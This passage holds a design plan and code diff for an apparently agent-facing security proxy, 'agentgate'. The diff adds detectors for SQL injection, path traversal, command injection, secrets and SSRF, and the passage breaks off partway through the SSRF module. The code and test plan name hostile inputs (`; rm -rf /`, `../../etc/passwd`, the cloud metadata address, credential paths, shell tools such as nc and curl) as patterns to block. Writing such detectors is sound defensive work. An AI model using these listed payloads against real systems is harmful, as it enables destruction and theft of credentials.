+            if result.matched:
+                results.append(result)
+        except Exception:
+            log.warning("Detector '%s' raised an exception, skipping", name, exc_info=True)
+    return results
+```
+
+**Key detail:** The `enabled` dict comes from `DetectorsConfig.model_dump()` — its keys are `sql_injection`, `path_traversal`, `command_injection`, `ssrf_private_ip`, `secrets_in_params`. The `_DETECTORS` dict must use the same keys. This is already true in the current `REGISTRY`.
+
+**What to remove:** Delete the `REGISTRY` dict (replaced by `_DETECTORS`). Delete the `NotImplementedError` stub.
+
+---
+
+### 3.2 `src/agentgate/engine.py` — Add Step 1 (Detectors)
+
+**Current state:** `evaluate()` has a comment placeholder `# --- Step 1: Detectors (Issue #26) ---`. Steps 2–3 (tool_block, tool_allow) and Step 6 (default) are implemented.
+
+**Target state:** Step 1 calls `detectors.run_all()`, and if any detector matched, returns a `block` Decision immediately (short-circuit).
+
+**Design decisions:**
+
+| Decision | Choice | Rationale |
+|----------|--------|-----------|
+| Signature change? | No — `evaluate(tool_call, policy)` stays the same | The `policy.config.detectors` field provides the enabled map. No new args needed. |
+| Which detector name goes in `matched_detector`? | First matched detector's name | Multiple detectors may fire. The Decision model has a single `matched_detector` string field. Use the first one — it's sufficient for the block message. All matches will be available in the audit log (Issue #12). |
+| Message format | `"Blocked by detector: {detector_name}: {detail}"` | Clear, actionable, includes the specific finding. |
+| What if policy is passthrough (no detectors config)? | Detectors still use defaults (all enabled) | `DetectorsConfig()` defaults all 5 to `True`. So even a minimal/empty policy runs all detectors. This is the correct security posture — detectors are the safety net. |
+
+**Implementation sketch:**
+
+```python
+from agentgate.detectors import run_all as run_detectors
+
+def evaluate(tool_call: ToolCall, policy: CompiledPolicy) -> Decision:
+    # --- Step 1: Detectors ---
+    detector_results = run_detectors(
+        tool_call, policy.config.detectors.model_dump()
+    )
+    if detector_results:
+        first = detector_results[0]
+        return Decision(
+            action="block",
+            matched_detector=first.detector_name,
+            message=first.detail,
+        )
+
+    # --- Step 2: tool_block --- (existing code, unchanged)
+    ...
+```
+
+**What changes:** ~8 lines added at the top of `evaluate()`. No other changes to engine.py.
+
+---
+
+### 3.3 `src/agentgate/proxy.py` — No changes required
+
+The proxy already calls `evaluate(parsed.tool_call, policy)` and checks `decision.action == "block"`. The `error_data` dict already includes `matched_detector`. No proxy changes needed.
+
+**However**, there is one gap: when the proxy runs in **passthrough mode** (`self.policy is None`), it skips `evaluate()` entirely and uses the plain `_relay` function. This means **detectors don't run in passthrough mode**. This is correct for MVP — passthrough means "no policy loaded, no enforcement." If you want detectors-always-on even without a policy file, that's a separate design decision for later. Document this as a known behavior, not a bug.
+
+---
+
+## 4. Test Plan
+
+### 4.1 Unit tests for `run_all()` — `tests/test_detectors/test_registry.py`
+
+| # | Test | What it proves |
+|---|------|----------------|
+| 1 | `run_all` with all detectors enabled, clean tool call → empty list | No false positives from the pipeline itself |
+| 2 | `run_all` with all enabled, tool call with `../../etc/passwd` in path param → list contains path_traversal result | Single detector fires correctly |
+| 3 | `run_all` with all enabled, tool call with `../../etc/passwd` AND `AKIA1234567890ABCDEF` → list contains both path_traversal and secrets results | Multiple detectors fire, both returned |
+| 4 | `run_all` with `path_traversal: false`, tool call with `../../etc/passwd` → empty list | Disabled detector is skipped |
+| 5 | `run_all` with all enabled, SQL injection payload → list contains sql_injection result | Wiring to sql_injection module works |
+| 6 | `run_all` with all enabled, SSRF payload (`http://169.254.169.254/`) → list contains ssrf result | Wiring to ssrf module works |
+| 7 | `run_all` with all enabled, command injection payload (``; rm -rf /``) → list contains command_injection result | Wiring to command_injection module works |
+| 8 | `run_all` with empty `enabled` dict → empty list | All detectors skipped when none enabled |
+
+All tests are sync, no I/O. Use `ToolCall(tool_name="test_tool", arguments={...})` directly.
+
+### 4.2 Engine integration tests — `tests/test_engine.py` (extend existing)
+
+| # | Test | What it proves |
+|---|------|----------------|
+| 9 | Engine blocks on path traversal even when tool is on allowlist | Detectors take precedence over tool_allow (Spec Section 5 precedence) |
+| 10 | Engine blocks on secrets even when no policy rules defined (default allow) | Detectors fire before default decision |
+| 11 | Engine returns `matched_detector` field (not `matched_rule`) for detector blocks | Decision metadata is correct |
+| 12 | Engine allows clean tool call that passes detectors and is on allowlist | Detectors don't interfere with normal flow |
+
+### 4.3 Proxy integration test — `tests/test_proxy_policy.py` (extend existing)
+
+| # | Test | What it proves |
+|---|------|----------------|
+| 13 | Proxy with policy, tool call with path traversal → JSON-RPC error returned to agent with detector info in `data` | Full end-to-end: proxy → parser → detectors → engine → error response |
+
+This test uses the existing `proxy_with_policy` fixture. Policy: default allow, all detectors enabled, tool on allowlist. Tool call: `read_file(path="/etc/passwd")`. Expected: JSON-RPC error with `matched_detector: "path_traversal"` in the error data.
+
+---
+
+## 5. Acceptance Criteria
+
+- [ ] `run_all()` in `detectors/__init__.py` is implemented (no more `NotImplementedError`)
+- [ ] `engine.evaluate()` calls detectors as Step 1 and short-circuits on match
+- [ ] A tool call with a path traversal payload is blocked by the engine even if the tool is on the allowlist
+- [ ] A tool call with both a path traversal and a secret returns a block decision with the first detector's name
+- [ ] Disabled detectors are not invoked
+- [ ] All existing tests (88 total across PR1) continue to pass — no regressions
+- [ ] All 13 new tests pass
+- [ ] `ruff check` and `ruff format` clean
+
+---
+
+## 6. Files Changed
+
+| File | Change type | Lines (est.) |
+|------|-------------|-------------|
+| `src/agentgate/detectors/__init__.py` | Rewrite | ~35 |
+| `src/agentgate/engine.py` | Add ~8 lines | ~8 |
+| `tests/test_detectors/test_registry.py` | New file | ~120 |
+| `tests/test_engine.py` | Add 4 tests | ~50 |
+| `tests/test_proxy_policy.py` | Add 1 test | ~25 |
+
+**Total:** ~240 lines of new/changed code.
+
+---
+
+## 7. Risks
+
+| Risk | Likelihood | Impact | Mitigation |
+|------|-----------|--------|------------|
+| Import cycle between `detectors/__init__` and detector modules | Low | Blocks startup | Detector modules don't import from `__init__`. One-way dependency. Verified by existing detector tests. |
+| `DetectorsConfig.model_dump()` key mismatch with `_DETECTORS` keys | Medium | Silent detector skip | Test #4 explicitly verifies disabled behavior, and tests #2–#7 verify each detector fires. Any key mismatch → test failure. |
+| Existing proxy integration tests break because detectors now fire on payloads that were previously allowed | Medium | CI red | Review existing test fixtures. The echo MCP server tests use tool names like `echo` with simple string args — unlikely to trigger detectors. If any do, update the test payloads to be detector-clean. |
+
+The third risk is the most likely to bite. **Before writing any code, grep existing test fixtures for strings that might match detector patterns** (e.g., any test that passes a path like `/etc/` or a string containing `DROP`).
+
+---
+
+## 8. Implementation Order
+
+1. **Grep existing tests** for detector-triggering payloads. Fix any that would break.
+2. **Implement `run_all()`** in `detectors/__init__.py`. Run the 8 new unit tests.
+3. **Wire Step 1 into `engine.evaluate()`**. Run the 4 new engine tests + all existing engine tests.
+4. **Add proxy integration test**. Run full test suite.
+5. **`ruff check && ruff format`**. Commit.
+
+Estimated wall time: 1.5–2 hours.

--- a/src/agentgate/cli.py
+++ b/src/agentgate/cli.py
@@ -61,8 +61,7 @@ def start(policy: str | None, verbose: bool, server_command: tuple[str, ...]) ->
     # --- Validate server command ---
     if not server_command:
         click.echo(
-            "Error: No server command provided.\n"
-            "Usage: agentgate start -- <command> [args...]",
+            "Error: No server command provided.\nUsage: agentgate start -- <command> [args...]",
             err=True,
         )
         raise SystemExit(1)
@@ -101,8 +100,7 @@ def start(policy: str | None, verbose: bool, server_command: tuple[str, ...]) ->
         raise SystemExit(130)
     except FileNotFoundError:
         click.echo(
-            f"Error: Command not found: '{server_command[0]}'. "
-            f"Is it installed and on your PATH?",
+            f"Error: Command not found: '{server_command[0]}'. Is it installed and on your PATH?",
             err=True,
         )
         raise SystemExit(1)

--- a/src/agentgate/detectors/__init__.py
+++ b/src/agentgate/detectors/__init__.py
@@ -2,31 +2,51 @@
 
 from __future__ import annotations
 
+import logging
 from typing import TYPE_CHECKING
 
 if TYPE_CHECKING:
     from agentgate.models import DetectorResult, ToolCall
 
-# Detector registry — maps config names to their module paths.
-# Each detector module must expose a `detect(tool_call: ToolCall) -> DetectorResult` function.
-REGISTRY: dict[str, str] = {
-    "sql_injection": "agentgate.detectors.sql_injection",
-    "path_traversal": "agentgate.detectors.path_traversal",
-    "command_injection": "agentgate.detectors.command_injection",
-    "ssrf_private_ip": "agentgate.detectors.ssrf",
-    "secrets_in_params": "agentgate.detectors.secrets",
+from agentgate.detectors import (
+    command_injection,
+    path_traversal,
+    secrets,
+    sql_injection,
+    ssrf,
+)
+
+log = logging.getLogger("agentgate.detectors")
+
+# Maps DetectorsConfig field name -> detector module.
+# Each module exposes detect(tool_call: ToolCall) -> DetectorResult.
+_DETECTORS: dict[str, object] = {
+    "sql_injection": sql_injection,
+    "path_traversal": path_traversal,
+    "command_injection": command_injection,
+    "ssrf_private_ip": ssrf,
+    "secrets_in_params": secrets,
 }
 
 
 def run_all(tool_call: ToolCall, enabled: dict[str, bool]) -> list[DetectorResult]:
-    """Run all enabled detectors against a tool call and return results.
+    """Run all enabled detectors against a tool call and return matched results.
 
     Args:
         tool_call: The tool call to scan.
         enabled: Mapping of detector name to enabled flag (from DetectorsConfig).
 
     Returns:
-        List of DetectorResult for detectors that matched.
+        List of DetectorResult for detectors that matched (matched=True only).
     """
-    # TODO: Import and invoke each enabled detector
-    raise NotImplementedError("Detector pipeline not yet implemented")
+    results: list[DetectorResult] = []
+    for name, module in _DETECTORS.items():
+        if not enabled.get(name, False):
+            continue
+        try:
+            result = module.detect(tool_call)  # type: ignore[attr-defined]
+            if result.matched:
+                results.append(result)
+        except Exception:
+            log.warning("Detector '%s' raised an exception, skipping", name, exc_info=True)
+    return results

--- a/src/agentgate/detectors/_util.py
+++ b/src/agentgate/detectors/_util.py
@@ -1,0 +1,30 @@
+"""Shared utilities for detector modules."""
+
+from __future__ import annotations
+
+from typing import Any
+
+
+def extract_strings(arguments: dict[str, Any], prefix: str = "") -> list[tuple[str, str]]:
+    """Recursively extract all (key_path, string_value) pairs from arguments.
+
+    Walks dicts, lists, and nested lists to find every string leaf value.
+    Returns a list of (dotted_key_path, string_value) tuples.
+    """
+    results: list[tuple[str, str]] = []
+    for key, value in arguments.items():
+        path = f"{prefix}.{key}" if prefix else key
+        _collect(value, path, results)
+    return results
+
+
+def _collect(value: Any, path: str, results: list[tuple[str, str]]) -> None:
+    """Recursively collect string values from an arbitrary JSON-like structure."""
+    if isinstance(value, str):
+        results.append((path, value))
+    elif isinstance(value, dict):
+        for k, v in value.items():
+            _collect(v, f"{path}.{k}", results)
+    elif isinstance(value, list):
+        for i, item in enumerate(value):
+            _collect(item, f"{path}[{i}]", results)

--- a/src/agentgate/detectors/command_injection.py
+++ b/src/agentgate/detectors/command_injection.py
@@ -35,18 +35,10 @@ _KNOWN_COMMANDS = (
 )
 
 # Category 1: Shell operators followed by command-like tokens
-_SEMICOLON_CMD = re.compile(
-    rf";\s*(?:{_KNOWN_COMMANDS})\b|;\s*[./~]", re.IGNORECASE
-)
-_AND_CMD = re.compile(
-    rf"&&\s*(?:{_KNOWN_COMMANDS})\b|&&\s*[./~]", re.IGNORECASE
-)
-_OR_CMD = re.compile(
-    rf"\|\|\s*(?:{_KNOWN_COMMANDS})\b|\|\|\s*[./~]", re.IGNORECASE
-)
-_PIPE_CMD = re.compile(
-    rf"(?<!\|)\|\s*(?:{_KNOWN_COMMANDS})\b", re.IGNORECASE
-)
+_SEMICOLON_CMD = re.compile(rf";\s*(?:{_KNOWN_COMMANDS})\b|;\s*[./~]", re.IGNORECASE)
+_AND_CMD = re.compile(rf"&&\s*(?:{_KNOWN_COMMANDS})\b|&&\s*[./~]", re.IGNORECASE)
+_OR_CMD = re.compile(rf"\|\|\s*(?:{_KNOWN_COMMANDS})\b|\|\|\s*[./~]", re.IGNORECASE)
+_PIPE_CMD = re.compile(rf"(?<!\|)\|\s*(?:{_KNOWN_COMMANDS})\b", re.IGNORECASE)
 _REDIRECT = re.compile(r">{1,2}\s*[/~.]")
 
 # Category 2: Command substitution — always suspicious

--- a/src/agentgate/detectors/command_injection.py
+++ b/src/agentgate/detectors/command_injection.py
@@ -1,1 +1,87 @@
-"""Command injection detector — flags shell metacharacters (;, &&, |, backticks, $()) in string parameters."""
+"""Command injection detector — flags shell metacharacters in string parameters."""
+
+from __future__ import annotations
+
+import re
+from typing import Any
+
+from agentgate.models import DetectorResult, ToolCall
+
+
+def _extract_strings(arguments: dict[str, Any], prefix: str = "") -> list[tuple[str, str]]:
+    """Recursively extract all (key_path, string_value) pairs from arguments."""
+    results: list[tuple[str, str]] = []
+    for key, value in arguments.items():
+        path = f"{prefix}.{key}" if prefix else key
+        if isinstance(value, str):
+            results.append((path, value))
+        elif isinstance(value, dict):
+            results.extend(_extract_strings(value, path))
+        elif isinstance(value, list):
+            for i, item in enumerate(value):
+                item_path = f"{path}[{i}]"
+                if isinstance(item, str):
+                    results.append((item_path, item))
+                elif isinstance(item, dict):
+                    results.extend(_extract_strings(item, item_path))
+    return results
+
+
+# Known shell commands that indicate injection intent after an operator
+_KNOWN_COMMANDS = (
+    r"rm|curl|wget|cat|echo|sh|bash|zsh|python[23]?|perl|ruby|nc|ncat"
+    r"|chmod|chown|sudo|kill|pkill|dd|mkfifo|tee|xargs|find|grep|sed|awk"
+    r"|eval|exec|source|export|env|nohup|setsid"
+)
+
+# Category 1: Shell operators followed by command-like tokens
+_SEMICOLON_CMD = re.compile(
+    rf";\s*(?:{_KNOWN_COMMANDS})\b|;\s*[./~]", re.IGNORECASE
+)
+_AND_CMD = re.compile(
+    rf"&&\s*(?:{_KNOWN_COMMANDS})\b|&&\s*[./~]", re.IGNORECASE
+)
+_OR_CMD = re.compile(
+    rf"\|\|\s*(?:{_KNOWN_COMMANDS})\b|\|\|\s*[./~]", re.IGNORECASE
+)
+_PIPE_CMD = re.compile(
+    rf"(?<!\|)\|\s*(?:{_KNOWN_COMMANDS})\b", re.IGNORECASE
+)
+_REDIRECT = re.compile(r">{1,2}\s*[/~.]")
+
+# Category 2: Command substitution — always suspicious
+_BACKTICK = re.compile(r"`[^`]+`")
+_DOLLAR_PAREN = re.compile(r"\$\([^)]+\)")
+
+# Category 3: Embedded newlines
+_NEWLINE = re.compile(r"\n")
+
+_PATTERNS: list[tuple[re.Pattern[str], str]] = [
+    (_SEMICOLON_CMD, "shell command after semicolon"),
+    (_AND_CMD, "shell command after &&"),
+    (_OR_CMD, "shell command after ||"),
+    (_PIPE_CMD, "pipe to shell command"),
+    (_REDIRECT, "output redirection to file"),
+    (_BACKTICK, "backtick command substitution"),
+    (_DOLLAR_PAREN, "$() command substitution"),
+    (_NEWLINE, "embedded newline"),
+]
+
+
+def detect(tool_call: ToolCall) -> DetectorResult:
+    """Scan all string parameter values for command injection patterns.
+
+    Returns DetectorResult with matched=True on first pattern hit.
+    """
+    strings = _extract_strings(tool_call.arguments)
+
+    for param_path, value in strings:
+        for pattern, label in _PATTERNS:
+            if pattern.search(value):
+                return DetectorResult(
+                    matched=True,
+                    detector_name="command_injection",
+                    detail=f"Command injection detected in param '{param_path}': {label}",
+                )
+
+    return DetectorResult(matched=False, detector_name="command_injection")

--- a/src/agentgate/detectors/command_injection.py
+++ b/src/agentgate/detectors/command_injection.py
@@ -3,28 +3,9 @@
 from __future__ import annotations
 
 import re
-from typing import Any
 
+from agentgate.detectors._util import extract_strings
 from agentgate.models import DetectorResult, ToolCall
-
-
-def _extract_strings(arguments: dict[str, Any], prefix: str = "") -> list[tuple[str, str]]:
-    """Recursively extract all (key_path, string_value) pairs from arguments."""
-    results: list[tuple[str, str]] = []
-    for key, value in arguments.items():
-        path = f"{prefix}.{key}" if prefix else key
-        if isinstance(value, str):
-            results.append((path, value))
-        elif isinstance(value, dict):
-            results.extend(_extract_strings(value, path))
-        elif isinstance(value, list):
-            for i, item in enumerate(value):
-                item_path = f"{path}[{i}]"
-                if isinstance(item, str):
-                    results.append((item_path, item))
-                elif isinstance(item, dict):
-                    results.extend(_extract_strings(item, item_path))
-    return results
 
 
 # Known shell commands that indicate injection intent after an operator
@@ -65,7 +46,7 @@ def detect(tool_call: ToolCall) -> DetectorResult:
 
     Returns DetectorResult with matched=True on first pattern hit.
     """
-    strings = _extract_strings(tool_call.arguments)
+    strings = extract_strings(tool_call.arguments)
 
     for param_path, value in strings:
         for pattern, label in _PATTERNS:

--- a/src/agentgate/detectors/path_traversal.py
+++ b/src/agentgate/detectors/path_traversal.py
@@ -1,1 +1,101 @@
-"""Path traversal detector — flags ../ sequences, absolute paths outside allowed directories, and sensitive file access."""
+"""Path traversal detector — flags ../ sequences, sensitive absolute paths, and null byte injection."""
+
+from __future__ import annotations
+
+import re
+from typing import Any
+
+from agentgate.models import DetectorResult, ToolCall
+
+
+def _extract_strings(arguments: dict[str, Any], prefix: str = "") -> list[tuple[str, str]]:
+    """Recursively extract all (key_path, string_value) pairs from arguments."""
+    results: list[tuple[str, str]] = []
+    for key, value in arguments.items():
+        path = f"{prefix}.{key}" if prefix else key
+        if isinstance(value, str):
+            results.append((path, value))
+        elif isinstance(value, dict):
+            results.extend(_extract_strings(value, path))
+        elif isinstance(value, list):
+            for i, item in enumerate(value):
+                item_path = f"{path}[{i}]"
+                if isinstance(item, str):
+                    results.append((item_path, item))
+                elif isinstance(item, dict):
+                    results.extend(_extract_strings(item, item_path))
+    return results
+
+
+# --- Pattern categories ---
+
+# Category 1: Traversal sequences (../ ..\ and URL-encoded variants)
+_TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\|%2e%2e(?:%2f|/|%5c|\\)", re.IGNORECASE)
+
+# Category 2: Sensitive path prefixes (checked via str.startswith)
+_SENSITIVE_PREFIXES: list[str] = [
+    "/etc/",
+    "/root/",
+    "/proc/",
+    "/sys/",
+    "/dev/",
+    "/var/log/",
+    "~/.ssh",
+    "~/.aws",
+    "~/.gnupg",
+    "~/.bashrc",
+    "~/.bash_history",
+    "~/.profile",
+    "~/.zshrc",
+    "~/.bash_profile",
+]
+
+# Category 2b: /home/<user>/.<sensitive_dir> pattern
+_HOME_SENSITIVE_RE = re.compile(r"^/home/[^/]+/\.(?:ssh|aws|gnupg)")
+
+# Category 3: Null byte injection (encoded representations)
+_NULL_BYTE_RE = re.compile(r"%00|\\x00|\\0")
+
+
+def detect(tool_call: ToolCall) -> DetectorResult:
+    """Scan all string parameter values for path traversal indicators.
+
+    Returns DetectorResult with matched=True on first pattern hit.
+    """
+    strings = _extract_strings(tool_call.arguments)
+
+    for param_path, value in strings:
+        # Category 1: Traversal sequences (../  ..\ and encoded variants)
+        if _TRAVERSAL_RE.search(value):
+            return DetectorResult(
+                matched=True,
+                detector_name="path_traversal",
+                detail=f"Path traversal sequence in param '{param_path}'",
+            )
+
+        # Category 2: Sensitive absolute path prefixes
+        for prefix in _SENSITIVE_PREFIXES:
+            if value.startswith(prefix):
+                return DetectorResult(
+                    matched=True,
+                    detector_name="path_traversal",
+                    detail=f"Sensitive path prefix '{prefix}' in param '{param_path}'",
+                )
+
+        # Category 2b: /home/<user>/.ssh etc
+        if _HOME_SENSITIVE_RE.search(value):
+            return DetectorResult(
+                matched=True,
+                detector_name="path_traversal",
+                detail=f"Sensitive home directory path in param '{param_path}'",
+            )
+
+        # Category 3: Null byte injection
+        if _NULL_BYTE_RE.search(value) or "\x00" in value:
+            return DetectorResult(
+                matched=True,
+                detector_name="path_traversal",
+                detail=f"Null byte injection in param '{param_path}'",
+            )
+
+    return DetectorResult(matched=False, detector_name="path_traversal")

--- a/src/agentgate/detectors/path_traversal.py
+++ b/src/agentgate/detectors/path_traversal.py
@@ -3,28 +3,9 @@
 from __future__ import annotations
 
 import re
-from typing import Any
 
+from agentgate.detectors._util import extract_strings
 from agentgate.models import DetectorResult, ToolCall
-
-
-def _extract_strings(arguments: dict[str, Any], prefix: str = "") -> list[tuple[str, str]]:
-    """Recursively extract all (key_path, string_value) pairs from arguments."""
-    results: list[tuple[str, str]] = []
-    for key, value in arguments.items():
-        path = f"{prefix}.{key}" if prefix else key
-        if isinstance(value, str):
-            results.append((path, value))
-        elif isinstance(value, dict):
-            results.extend(_extract_strings(value, path))
-        elif isinstance(value, list):
-            for i, item in enumerate(value):
-                item_path = f"{path}[{i}]"
-                if isinstance(item, str):
-                    results.append((item_path, item))
-                elif isinstance(item, dict):
-                    results.extend(_extract_strings(item, item_path))
-    return results
 
 
 # --- Pattern categories ---
@@ -62,7 +43,7 @@ def detect(tool_call: ToolCall) -> DetectorResult:
 
     Returns DetectorResult with matched=True on first pattern hit.
     """
-    strings = _extract_strings(tool_call.arguments)
+    strings = extract_strings(tool_call.arguments)
 
     for param_path, value in strings:
         # Category 1: Traversal sequences (../  ..\ and encoded variants)

--- a/src/agentgate/detectors/secrets.py
+++ b/src/agentgate/detectors/secrets.py
@@ -1,1 +1,86 @@
 """Secrets detector — flags AWS keys, GitHub tokens, private keys, and password patterns in any parameter value."""
+
+from __future__ import annotations
+
+import re
+from typing import Any
+
+from agentgate.models import DetectorResult, ToolCall
+
+
+def _extract_strings(arguments: dict[str, Any], prefix: str = "") -> list[tuple[str, str]]:
+    """Recursively extract all (key_path, string_value) pairs from arguments."""
+    results: list[tuple[str, str]] = []
+    for key, value in arguments.items():
+        path = f"{prefix}.{key}" if prefix else key
+        if isinstance(value, str):
+            results.append((path, value))
+        elif isinstance(value, dict):
+            results.extend(_extract_strings(value, path))
+        elif isinstance(value, list):
+            for i, item in enumerate(value):
+                item_path = f"{path}[{i}]"
+                if isinstance(item, str):
+                    results.append((item_path, item))
+                elif isinstance(item, dict):
+                    results.extend(_extract_strings(item, item_path))
+    return results
+
+
+_SECRET_PATTERNS: list[tuple[re.Pattern[str], str]] = [
+    # AWS Access Key ID (case-sensitive, exact format)
+    (re.compile(r"AKIA[0-9A-Z]{16}"), "AWS access key ID"),
+    # AWS Secret Key assignment (case-insensitive key name)
+    (
+        re.compile(
+            r"(?:aws_secret_access_key|aws_secret_key|AWS_SECRET_ACCESS_KEY)"
+            r"\s*[=:]\s*\S+",
+            re.IGNORECASE,
+        ),
+        "AWS secret access key assignment",
+    ),
+    # GitHub tokens (case-sensitive prefix, exact format)
+    (re.compile(r"(?:ghp_|gho_|ghs_|ghu_)[A-Za-z0-9]{36}"), "GitHub token"),
+    (re.compile(r"github_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59}"), "GitHub fine-grained PAT"),
+    # PEM private key header
+    (
+        re.compile(
+            r"-----BEGIN\s+(?:RSA\s+|DSA\s+|EC\s+|OPENSSH\s+|ENCRYPTED\s+)?PRIVATE\s+KEY-----"
+        ),
+        "PEM private key",
+    ),
+    # Generic password/secret assignment (case-insensitive)
+    (
+        re.compile(
+            r"(?:password|passwd|pwd|secret|api_key|apikey|api_secret|access_token|auth_token)"
+            r"\s*[=:]\s*\S+",
+            re.IGNORECASE,
+        ),
+        "password/secret assignment",
+    ),
+    # Slack tokens
+    (re.compile(r"xox[bpors]-[A-Za-z0-9\-]{10,}"), "Slack token"),
+    # Bearer token
+    (re.compile(r"Bearer\s+[A-Za-z0-9\-._~+/]+=*"), "Bearer authorization token"),
+    # Stripe keys
+    (re.compile(r"(?:sk|pk)_(?:live|test)_[A-Za-z0-9]{24,}"), "Stripe API key"),
+]
+
+
+def detect(tool_call: ToolCall) -> DetectorResult:
+    """Scan all string parameter values for secret/credential patterns.
+
+    Returns DetectorResult with matched=True on first pattern hit.
+    """
+    strings = _extract_strings(tool_call.arguments)
+
+    for param_path, value in strings:
+        for pattern, label in _SECRET_PATTERNS:
+            if pattern.search(value):
+                return DetectorResult(
+                    matched=True,
+                    detector_name="secrets_in_params",
+                    detail=f"Secret detected in param '{param_path}': {label}",
+                )
+
+    return DetectorResult(matched=False, detector_name="secrets_in_params")

--- a/src/agentgate/detectors/secrets.py
+++ b/src/agentgate/detectors/secrets.py
@@ -3,28 +3,9 @@
 from __future__ import annotations
 
 import re
-from typing import Any
 
+from agentgate.detectors._util import extract_strings
 from agentgate.models import DetectorResult, ToolCall
-
-
-def _extract_strings(arguments: dict[str, Any], prefix: str = "") -> list[tuple[str, str]]:
-    """Recursively extract all (key_path, string_value) pairs from arguments."""
-    results: list[tuple[str, str]] = []
-    for key, value in arguments.items():
-        path = f"{prefix}.{key}" if prefix else key
-        if isinstance(value, str):
-            results.append((path, value))
-        elif isinstance(value, dict):
-            results.extend(_extract_strings(value, path))
-        elif isinstance(value, list):
-            for i, item in enumerate(value):
-                item_path = f"{path}[{i}]"
-                if isinstance(item, str):
-                    results.append((item_path, item))
-                elif isinstance(item, dict):
-                    results.extend(_extract_strings(item, item_path))
-    return results
 
 
 _SECRET_PATTERNS: list[tuple[re.Pattern[str], str]] = [
@@ -72,7 +53,7 @@ def detect(tool_call: ToolCall) -> DetectorResult:
 
     Returns DetectorResult with matched=True on first pattern hit.
     """
-    strings = _extract_strings(tool_call.arguments)
+    strings = extract_strings(tool_call.arguments)
 
     for param_path, value in strings:
         for pattern, label in _SECRET_PATTERNS:

--- a/src/agentgate/detectors/sql_injection.py
+++ b/src/agentgate/detectors/sql_injection.py
@@ -1,1 +1,66 @@
-"""SQL injection detector — flags destructive SQL patterns (DROP, DELETE, UNION SELECT, etc.) in string parameters."""
+"""SQL injection detector — flags destructive SQL patterns in string parameters."""
+
+from __future__ import annotations
+
+import re
+from typing import Any
+
+from agentgate.models import DetectorResult, ToolCall
+
+
+def _extract_strings(arguments: dict[str, Any], prefix: str = "") -> list[tuple[str, str]]:
+    """Recursively extract all (key_path, string_value) pairs from arguments."""
+    results: list[tuple[str, str]] = []
+    for key, value in arguments.items():
+        path = f"{prefix}.{key}" if prefix else key
+        if isinstance(value, str):
+            results.append((path, value))
+        elif isinstance(value, dict):
+            results.extend(_extract_strings(value, path))
+        elif isinstance(value, list):
+            for i, item in enumerate(value):
+                item_path = f"{path}[{i}]"
+                if isinstance(item, str):
+                    results.append((item_path, item))
+                elif isinstance(item, dict):
+                    results.extend(_extract_strings(item, item_path))
+    return results
+
+
+_SQL_PATTERNS: list[tuple[re.Pattern[str], str]] = [
+    # Tier 1: Destructive statements
+    (re.compile(r"\bDROP\s+(TABLE|DATABASE|INDEX|VIEW|SCHEMA)\b", re.I), "DROP statement"),
+    (re.compile(r"\bDELETE\s+FROM\b", re.I), "DELETE FROM statement"),
+    (re.compile(r"\bTRUNCATE\s+(TABLE\s+)?\w", re.I), "TRUNCATE statement"),
+    (re.compile(r"\bALTER\s+TABLE\b", re.I), "ALTER TABLE statement"),
+    (re.compile(r"\bUPDATE\s+\S+\s+SET\b", re.I), "UPDATE...SET statement"),
+    (re.compile(r"\bINSERT\s+INTO\b", re.I), "INSERT INTO statement"),
+    (re.compile(r"\bEXEC(UTE)?\s*\(", re.I), "EXEC/EXECUTE call"),
+    # Tier 2: Injection indicators
+    (re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I), "UNION SELECT"),
+    (re.compile(r"\bOR\s+['\"]?\d+['\"]?\s*=\s*['\"]?\d+['\"]?", re.I), "OR tautology"),
+    (re.compile(r";\s*--", re.I), "stacked query with comment"),
+    (
+        re.compile(r";\s*(DROP|DELETE|INSERT|UPDATE|TRUNCATE|ALTER|EXEC)\b", re.I),
+        "stacked destructive query",
+    ),
+]
+
+
+def detect(tool_call: ToolCall) -> DetectorResult:
+    """Scan all string parameter values for SQL injection patterns.
+
+    Returns DetectorResult with matched=True on first pattern hit.
+    """
+    strings = _extract_strings(tool_call.arguments)
+
+    for param_path, value in strings:
+        for pattern, label in _SQL_PATTERNS:
+            if pattern.search(value):
+                return DetectorResult(
+                    matched=True,
+                    detector_name="sql_injection",
+                    detail=f"SQL injection detected in param '{param_path}': {label}",
+                )
+
+    return DetectorResult(matched=False, detector_name="sql_injection")

--- a/src/agentgate/detectors/sql_injection.py
+++ b/src/agentgate/detectors/sql_injection.py
@@ -3,28 +3,9 @@
 from __future__ import annotations
 
 import re
-from typing import Any
 
+from agentgate.detectors._util import extract_strings
 from agentgate.models import DetectorResult, ToolCall
-
-
-def _extract_strings(arguments: dict[str, Any], prefix: str = "") -> list[tuple[str, str]]:
-    """Recursively extract all (key_path, string_value) pairs from arguments."""
-    results: list[tuple[str, str]] = []
-    for key, value in arguments.items():
-        path = f"{prefix}.{key}" if prefix else key
-        if isinstance(value, str):
-            results.append((path, value))
-        elif isinstance(value, dict):
-            results.extend(_extract_strings(value, path))
-        elif isinstance(value, list):
-            for i, item in enumerate(value):
-                item_path = f"{path}[{i}]"
-                if isinstance(item, str):
-                    results.append((item_path, item))
-                elif isinstance(item, dict):
-                    results.extend(_extract_strings(item, item_path))
-    return results
 
 
 _SQL_PATTERNS: list[tuple[re.Pattern[str], str]] = [
@@ -52,7 +33,7 @@ def detect(tool_call: ToolCall) -> DetectorResult:
 
     Returns DetectorResult with matched=True on first pattern hit.
     """
-    strings = _extract_strings(tool_call.arguments)
+    strings = extract_strings(tool_call.arguments)
 
     for param_path, value in strings:
         for pattern, label in _SQL_PATTERNS:

--- a/src/agentgate/detectors/ssrf.py
+++ b/src/agentgate/detectors/ssrf.py
@@ -1,1 +1,94 @@
-"""SSRF detector — flags private, loopback, link-local, and cloud metadata IP addresses in URL parameters."""
+"""SSRF private IP detector — flags URLs and bare IPs targeting private/internal addresses."""
+
+from __future__ import annotations
+
+import ipaddress
+import re
+import urllib.parse
+from typing import Any
+
+from agentgate.models import DetectorResult, ToolCall
+
+# Conservative bare-IP regexes (avoid false positives on non-IP strings)
+_BARE_IPV4_RE = re.compile(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$")
+_BARE_IPV6_RE = re.compile(r"^\[?[0-9a-fA-F:]+\]?$")
+
+
+def _extract_strings(arguments: dict[str, Any], prefix: str = "") -> list[tuple[str, str]]:
+    """Recursively extract all (key_path, string_value) pairs from arguments."""
+    results: list[tuple[str, str]] = []
